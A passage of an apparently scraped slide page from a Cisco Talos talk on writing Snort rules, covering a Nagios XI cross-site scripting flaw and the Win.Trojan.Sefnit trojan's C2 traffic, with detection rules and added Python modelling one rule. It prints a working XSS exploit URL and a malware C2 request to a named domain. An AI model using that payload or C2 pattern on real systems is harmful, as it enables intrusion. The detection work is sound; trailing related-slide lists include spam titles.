reference:cve,2012-2516; 
classtype:attempted-user; 
)
Cross Site Scripting (XSS) Overview
OSVDB-89893
Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient
sanitization of ‘width’ and ‘height’ parameters sent to the URI:
/includes/components/alertcloud/index.php
Exploit:
/nagiosxi/includes/components/alertcloud/index.php?height=4"}};alert('XSS'); var aa={"A":{"B":"
Cross Site Scripting (XSS) Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt"; 
flow:to_server,established; 
content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri; 
pcre:"/[?&](height|width)=[^&]*?([x22x27x3cx3ex28x29]|script|onload|src)/Ui"; 
metadata:service http; 
reference:url,osvdb.org/show/osvdb/89893; 
classtype:web-application-attack; 
)
Malware Sample Overview
Win.Trojan.Sefnit
Upon execution Win.Trojan.Sefnit drops a service to %AppData%\Updater\updater.dll and starts it.
When the service updater.dll starts it attempts to read tasks from the configuration file
%AppData%\Updater/~conf.dat
Initially the conf.dat file doesn't exist. The sample obtains the Disk Volume Serial number and
appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the
encrypted value and converts it to a 32 character hex string and uses this string as a UUID sent in
the initial request to C2:
GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1
Host: axnlze.net
Accept: */*
The URI above has the following hardcoded format:
hxxp://<c2domain>/j/<uuid>/<version>
Malware Sample Disassembly
10015B27 PUSH 10112E28 ; /Arg1 = UNICODE ;"c2.net/j/<uuid>/<version>"
10015B2C LEA ECX,DWORD PTR SS:[EBP-4C] ; |
10015B2F CALL <_wcslen-copystr> ; updater.10001BA4
10015B34 MOV BYTE PTR SS:[EBP-4],1
10015B38 MOV EDI,10112E14 ; UNICODE "<uuid>"
10015B3D PUSH EDI ; /Arg1 => 10112E14
10015B3E CALL <_wcslen> ; updater.100196E1
...
10015BBB PUSH ESI ; UNICODE "<version>"
10015BBC LEA ECX,DWORD PTR SS:[EBP-4C]
10015BBF CALL <substr_loc>
10015BC4 MOV DWORD PTR SS:[EBP-1DC],EAX
10015BCA PUSH ESI ; UNICODE "<version>"
10015BCB CALL <_wcslen>
10015BD0 MOV DWORD PTR SS:[EBP-1EC],EAX
10015BD6 MOV EDI,10112E08 ; UNICODE "0001"
...
1005A043 PUSH 0 ; /Arg4 = 00000000
1005A045 PUSH ECX ; |Arg3 = 008DAA60 ASCII ; "/j/20a0b8237d5b084e46bd673e26d948bf/0001"
1005A046 PUSH EBX ; |Arg2 = 1011B340 ASCII "GET"
1005A047 PUSH EDI ; |Arg1 008C9138 = NULL
1005A048 CALL 10058E00 ; updater.10058E00
Malware Command Traffic Detection
#
# C2 request detection
#
# hardcoded urilen
urilen:40,norm; 
# hardcoded uri pattern, begins with "/j/"
content:"/j/"; depth:3; http_uri; 
# ends with "/0001"
content:"/0001"; distance:32; within:5; http_uri; 
# no User-Agent in C2 request
content:!"User-Agent"; http_header; 
# final verification of C2 URI pattern
pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U";
Malware Command Traffic Detection
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS ( 
msg:"MALWARE-CNC Win.Trojan.Sefnit variant outbound connection attempt";
flow:to_server,established; 
urilen:40,norm; 
content:"/j/"; depth:3; http_uri; 
content:"/0001"; within:5; distance:32; http_uri; 
content:!"User-Agent"; http_header; 
pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U"; 
metadata:impact_flag red, service http; 
classtype:trojan-activity; 
)
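The Sefnit rule stacks four cheap structural checks (urilen, the "/j/" prefix, "/0001" at a fixed distance, and the absence of a User-Agent header) in front of the pcre that finally verifies the 32 hex characters. The added Python below (written for this page, not Talos code) applies those checks to a minimal parsed HTTP request; the positive sample is the request captured on the overview slide, the other three are constructed to fail a different check each.

```python
import re

# Added example: Python model of the Win.Trojan.Sefnit C2 rule body over raw
# HTTP request text.  The request parser is a deliberately minimal stand-in
# for Snort's HTTP inspector.
C2_URI_RE = re.compile(rb"^\x2fj\x2f[a-f0-9]{32}\x2f0001$")   # the rule's pcre (/U)


def parse_request(raw: bytes):
    """Split a raw request into (method, uri, header block); body is ignored."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, uri, _version = lines[0].split(b" ", 2)
    return method, uri, b"\r\n".join(lines[1:])


def is_sefnit_c2(raw: bytes) -> bool:
    _method, uri, headers = parse_request(raw)
    if len(uri) != 40:                         # urilen:40,norm;
        return False
    if not uri.startswith(b"/j/"):             # content:"/j/"; depth:3; http_uri;
        return False
    if uri[35:40] != b"/0001":                 # content:"/0001"; distance:32; within:5; http_uri;
        return False
    if b"User-Agent" in headers:               # content:!"User-Agent"; http_header; (case-sensitive, as written)
        return False
    return C2_URI_RE.match(uri) is not None    # final verification of the 32-hex-char uuid


# Request from the overview slide.
C2_REQUEST = (b"GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1\r\n"
              b"Host: axnlze.net\r\nAccept: */*\r\n\r\n")
# Constructed negatives: same URI but a browser-style header; too-short URI; uppercase "hex".
BROWSER_REQUEST = (b"GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1\r\n"
                   b"Host: axnlze.net\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n")
SHORT_REQUEST = b"GET /j/abc/0001 HTTP/1.1\r\nHost: example.com\r\n\r\n"
UPPER_HEX_REQUEST = (b"GET /j/" + b"A" * 32 + b"/0001 HTTP/1.1\r\n"
                     b"Host: example.com\r\n\r\n")

if __name__ == "__main__":
    for name, req in [("c2", C2_REQUEST), ("browser", BROWSER_REQUEST),
                      ("short", SHORT_REQUEST), ("upper-hex", UPPER_HEX_REQUEST)]:
        print(name, is_sefnit_c2(req))
```

The uppercase sample passes every content check and is stopped only by the pcre, which is the role the slide assigns it: the content options are the fast filter, the regex is the last word. Note also that the negated User-Agent match is case-sensitive as the rule is written; header names are case-insensitive on the wire, so a client that spelled the header differently would not be excluded by that option.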
Call to Action
• Related sessions:
  • Introduction to Snort Rule Writing
  • Detection Strategies with Snort [DevNet-1126]
• Visit the World of Solutions for
  • Cisco Campus
  • Walk in Labs
  • Technical Solution Clinics
• Meet the Engineer - Available immediately after this talk.
Brandon Stultz
talosintel.com
@talossecurity

 
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
DEVNET-1158	Cognitive Threat Analytics - Behavioral Breach Detection & Securi...DEVNET-1158	Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...Cisco DevNet
 
Intrusion detection system ppt
Intrusion detection system pptIntrusion detection system ppt
Intrusion detection system pptSheetal Verma
 
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...ijsrd.com
 
ImmaginAzione - svilupparla col metodo WoodysÂź
ImmaginAzione - svilupparla col metodo WoodysÂźImmaginAzione - svilupparla col metodo WoodysÂź
ImmaginAzione - svilupparla col metodo WoodysÂźDiego Senziani
 
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1
Clarkson   joshua white - ids testing - spie 2013 presentation - jsw - d1Clarkson   joshua white - ids testing - spie 2013 presentation - jsw - d1
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1Joshua S. White, PhD josh@securemind.org
 
Sms compliance white paper for mobile communications
Sms compliance white paper for mobile communicationsSms compliance white paper for mobile communications
Sms compliance white paper for mobile communicationsTextGuard
 
Regular Expression Mining System for Information Extraction
Regular Expression Mining System for Information ExtractionRegular Expression Mining System for Information Extraction
Regular Expression Mining System for Information ExtractionDimuthu Samarasekara
 
Pcre introduciton
Pcre introducitonPcre introduciton
Pcre introducitonYi-Jun Zheng
 
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...amiable_indian
 
All About Snort
All About SnortAll About Snort
All About Snort28pranjal
 
Industrial Training - Network Intrusion Detection System Using Snort
Industrial Training - Network Intrusion Detection System Using SnortIndustrial Training - Network Intrusion Detection System Using Snort
Industrial Training - Network Intrusion Detection System Using SnortDisha Bedi
 

Andere mochten auch (20)

Snort IDS/IPS Basics
Snort IDS/IPS BasicsSnort IDS/IPS Basics
Snort IDS/IPS Basics
 
Snort-IPS-Tutorial
Snort-IPS-TutorialSnort-IPS-Tutorial
Snort-IPS-Tutorial
 
Snort IPS
Snort IPSSnort IPS
Snort IPS
 
Starting the DevOps Train
Starting the DevOps TrainStarting the DevOps Train
Starting the DevOps Train
 
DEVNET-1166 Open SDN Controller APIs
DEVNET-1166	Open SDN Controller APIsDEVNET-1166	Open SDN Controller APIs
DEVNET-1166 Open SDN Controller APIs
 
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
DEVNET-1158	Cognitive Threat Analytics - Behavioral Breach Detection & Securi...DEVNET-1158	Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
DEVNET-1158 Cognitive Threat Analytics - Behavioral Breach Detection & Securi...
 
Intrusion detection system ppt
Intrusion detection system pptIntrusion detection system ppt
Intrusion detection system ppt
 
Snort manual
Snort manualSnort manual
Snort manual
 
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
A Survey on DPI Techniques for Regular Expression Detection in Network Intrus...
 
ImmaginAzione - svilupparla col metodo WoodysÂź
ImmaginAzione - svilupparla col metodo WoodysÂźImmaginAzione - svilupparla col metodo WoodysÂź
ImmaginAzione - svilupparla col metodo WoodysÂź
 
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1
Clarkson   joshua white - ids testing - spie 2013 presentation - jsw - d1Clarkson   joshua white - ids testing - spie 2013 presentation - jsw - d1
Clarkson joshua white - ids testing - spie 2013 presentation - jsw - d1
 
Sms compliance white paper for mobile communications
Sms compliance white paper for mobile communicationsSms compliance white paper for mobile communications
Sms compliance white paper for mobile communications
 
Regular Expression Mining System for Information Extraction
Regular Expression Mining System for Information ExtractionRegular Expression Mining System for Information Extraction
Regular Expression Mining System for Information Extraction
 
Malicious traffic
Malicious trafficMalicious traffic
Malicious traffic
 
Pcre introduciton
Pcre introducitonPcre introduciton
Pcre introduciton
 
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
Lessons Learned from Teaching Intrusion Detection and Intrusion Prevention wi...
 
All About Snort
All About SnortAll About Snort
All About Snort
 
Snort IDS
Snort IDSSnort IDS
Snort IDS
 
Industrial Training - Network Intrusion Detection System Using Snort
Industrial Training - Network Intrusion Detection System Using SnortIndustrial Training - Network Intrusion Detection System Using Snort
Industrial Training - Network Intrusion Detection System Using Snort
 
Snort
SnortSnort
Snort
 

Ähnlich wie Introduction to Snort Rule Writing

Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016Codemotion
 
Web application technologies
Web application technologiesWeb application technologies
Web application technologiesAtul Tiwari
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Amazon Web Services
 
Ato2019 weave-services-istio
Ato2019 weave-services-istioAto2019 weave-services-istio
Ato2019 weave-services-istioLin Sun
 
Weave Your Microservices with Istio
Weave Your Microservices with IstioWeave Your Microservices with Istio
Weave Your Microservices with IstioAll Things Open
 
All Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioAll Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioLin Sun
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Design Summit - RESTful API Overview - John Hardy
Design Summit - RESTful API Overview - John HardyDesign Summit - RESTful API Overview - John Hardy
Design Summit - RESTful API Overview - John HardyManageIQ
 
Student Name _________________________________ Date _____________SE.docx
Student Name _________________________________  Date _____________SE.docxStudent Name _________________________________  Date _____________SE.docx
Student Name _________________________________ Date _____________SE.docxemelyvalg9
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentationowaspsd
 
apache-refcard-a4.pdf
apache-refcard-a4.pdfapache-refcard-a4.pdf
apache-refcard-a4.pdfGiovaRossi
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Susam Pal
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Secure Programming
Secure ProgrammingSecure Programming
Secure Programmingalpha0
 
03 sockets
03 sockets03 sockets
03 socketsPavan Illa
 

Ähnlich wie Introduction to Snort Rule Writing (20)

Web application security
Web application securityWeb application security
Web application security
 
CGI.ppt
CGI.pptCGI.ppt
CGI.ppt
 
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
Why Rust? - Matthias Endler - Codemotion Amsterdam 2016
 
FFmpeg
FFmpegFFmpeg
FFmpeg
 
Web application technologies
Web application technologiesWeb application technologies
Web application technologies
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)
 
Ato2019 weave-services-istio
Ato2019 weave-services-istioAto2019 weave-services-istio
Ato2019 weave-services-istio
 
Weave Your Microservices with Istio
Weave Your Microservices with IstioWeave Your Microservices with Istio
Weave Your Microservices with Istio
 
All Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istioAll Things Open 2019 weave-services-istio
All Things Open 2019 weave-services-istio
 
Dynamic Web Programming
Dynamic Web ProgrammingDynamic Web Programming
Dynamic Web Programming
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Design Summit - RESTful API Overview - John Hardy
Design Summit - RESTful API Overview - John HardyDesign Summit - RESTful API Overview - John Hardy
Design Summit - RESTful API Overview - John Hardy
 
Student Name _________________________________ Date _____________SE.docx
Student Name _________________________________  Date _____________SE.docxStudent Name _________________________________  Date _____________SE.docx
Student Name _________________________________ Date _____________SE.docx
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
apache-refcard-a4.pdf
apache-refcard-a4.pdfapache-refcard-a4.pdf
apache-refcard-a4.pdf
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Secure Programming
Secure ProgrammingSecure Programming
Secure Programming
 
03 sockets
03 sockets03 sockets
03 sockets
 

Mehr von Cisco DevNet

How to Contribute to Ansible
How to Contribute to AnsibleHow to Contribute to Ansible
How to Contribute to AnsibleCisco DevNet
 
Rome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat botsRome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat botsCisco DevNet
 
How to Build Advanced Voice Assistants and Chatbots
How to Build Advanced Voice Assistants and ChatbotsHow to Build Advanced Voice Assistants and Chatbots
How to Build Advanced Voice Assistants and ChatbotsCisco DevNet
 
Cisco Spark and Tropo and the Programmable Web
Cisco Spark and Tropo and the Programmable WebCisco Spark and Tropo and the Programmable Web
Cisco Spark and Tropo and the Programmable WebCisco DevNet
 
Device Programmability with Cisco Plug-n-Play Solution
Device Programmability with Cisco Plug-n-Play SolutionDevice Programmability with Cisco Plug-n-Play Solution
Device Programmability with Cisco Plug-n-Play SolutionCisco DevNet
 
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap APIBuilding a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap APICisco DevNet
 
Application Visibility and Experience through Flexible Netflow
Application Visibility and Experience through Flexible NetflowApplication Visibility and Experience through Flexible Netflow
Application Visibility and Experience through Flexible NetflowCisco DevNet
 
WAN Automation Engine API Deep Dive
WAN Automation Engine API Deep DiveWAN Automation Engine API Deep Dive
WAN Automation Engine API Deep DiveCisco DevNet
 
Cisco's Open Device Programmability Strategy: Open Discussion
Cisco's Open Device Programmability Strategy: Open DiscussionCisco's Open Device Programmability Strategy: Open Discussion
Cisco's Open Device Programmability Strategy: Open DiscussionCisco DevNet
 
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)Cisco DevNet
 
NETCONF & YANG Enablement of Network Devices
NETCONF & YANG Enablement of Network DevicesNETCONF & YANG Enablement of Network Devices
NETCONF & YANG Enablement of Network DevicesCisco DevNet
 
UCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep DiveUCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep DiveCisco DevNet
 
OpenStack Enabling DevOps
OpenStack Enabling DevOpsOpenStack Enabling DevOps
OpenStack Enabling DevOpsCisco DevNet
 
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...Cisco DevNet
 
Getting Started: Developing Tropo Applications
Getting Started: Developing Tropo ApplicationsGetting Started: Developing Tropo Applications
Getting Started: Developing Tropo ApplicationsCisco DevNet
 
Cisco Spark & Tropo API Workshop
Cisco Spark & Tropo API WorkshopCisco Spark & Tropo API Workshop
Cisco Spark & Tropo API WorkshopCisco DevNet
 
Coding 102 REST API Basics Using Spark
Coding 102 REST API Basics Using SparkCoding 102 REST API Basics Using Spark
Coding 102 REST API Basics Using SparkCisco DevNet
 
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco DevNet
 
DevNet Express - Spark & Tropo API - Lisbon May 2016
DevNet Express - Spark & Tropo API - Lisbon May 2016DevNet Express - Spark & Tropo API - Lisbon May 2016
DevNet Express - Spark & Tropo API - Lisbon May 2016Cisco DevNet
 
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016Cisco DevNet
 

Mehr von Cisco DevNet (20)

How to Contribute to Ansible
How to Contribute to AnsibleHow to Contribute to Ansible
How to Contribute to Ansible
 
Rome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat botsRome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat bots
 
How to Build Advanced Voice Assistants and Chatbots
How to Build Advanced Voice Assistants and ChatbotsHow to Build Advanced Voice Assistants and Chatbots
How to Build Advanced Voice Assistants and Chatbots
 
Cisco Spark and Tropo and the Programmable Web
Cisco Spark and Tropo and the Programmable WebCisco Spark and Tropo and the Programmable Web
Cisco Spark and Tropo and the Programmable Web
 
Device Programmability with Cisco Plug-n-Play Solution
Device Programmability with Cisco Plug-n-Play SolutionDevice Programmability with Cisco Plug-n-Play Solution
Device Programmability with Cisco Plug-n-Play Solution
 
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap APIBuilding a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
 
Application Visibility and Experience through Flexible Netflow
Application Visibility and Experience through Flexible NetflowApplication Visibility and Experience through Flexible Netflow
Application Visibility and Experience through Flexible Netflow
 
WAN Automation Engine API Deep Dive
WAN Automation Engine API Deep DiveWAN Automation Engine API Deep Dive
WAN Automation Engine API Deep Dive
 
Cisco's Open Device Programmability Strategy: Open Discussion
Cisco's Open Device Programmability Strategy: Open DiscussionCisco's Open Device Programmability Strategy: Open Discussion
Cisco's Open Device Programmability Strategy: Open Discussion
 
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
 
NETCONF & YANG Enablement of Network Devices
NETCONF & YANG Enablement of Network DevicesNETCONF & YANG Enablement of Network Devices
NETCONF & YANG Enablement of Network Devices
 
UCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep DiveUCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep Dive
 
OpenStack Enabling DevOps
OpenStack Enabling DevOpsOpenStack Enabling DevOps
OpenStack Enabling DevOps
 
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
 
Getting Started: Developing Tropo Applications
Getting Started: Developing Tropo ApplicationsGetting Started: Developing Tropo Applications
Getting Started: Developing Tropo Applications
 
Cisco Spark & Tropo API Workshop
Cisco Spark & Tropo API WorkshopCisco Spark & Tropo API Workshop
Cisco Spark & Tropo API Workshop
 
Coding 102 REST API Basics Using Spark
Coding 102 REST API Basics Using SparkCoding 102 REST API Basics Using Spark
Coding 102 REST API Basics Using Spark
 
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
 
DevNet Express - Spark & Tropo API - Lisbon May 2016
DevNet Express - Spark & Tropo API - Lisbon May 2016DevNet Express - Spark & Tropo API - Lisbon May 2016
DevNet Express - Spark & Tropo API - Lisbon May 2016
 
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
 

KĂŒrzlich hochgeladen

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...gurkirankumar98700
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 

KĂŒrzlich hochgeladen (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
